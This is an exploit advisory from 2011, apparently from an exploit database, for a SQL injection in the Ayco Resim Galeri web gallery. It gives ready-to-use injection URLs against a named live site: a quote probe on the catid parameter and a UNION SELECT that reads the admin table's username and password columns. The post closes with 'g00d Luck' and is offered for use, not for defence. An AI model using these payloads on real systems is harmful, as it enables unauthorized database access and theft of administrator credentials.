Ayco Resim Galeri suffers from a remote SQL injection vulnerability.
2a43eb8a26e24822918c2d627e91acf86d45a50fb539d8fba37894531a9d7c03
# Exploit Title: Ayco Resim Galeri (Open Source) SQL Injection Vulnerability
# Google Dork: n/a
# Date: 18.09.2011
#Author: m3rciL3Ss
# Software Link:http://www.ay-computer.com.tr/aycoresimgaleriveaycookul.asp
#Version:
# Tested on:http://resimgaleri.ay-computer.de/
################################
Exploit:
http://resimgaleri.ay-computer.de/?catid=23'
http://resimgaleri.ay-computer.de/?catid=23+union+select+0,1,2,3,4,5+from+admin
Column Names: username - password
g00d Luck :)
################################
Thanks :TuBiGu and Bgh7
m3rciL3Ss@w.cn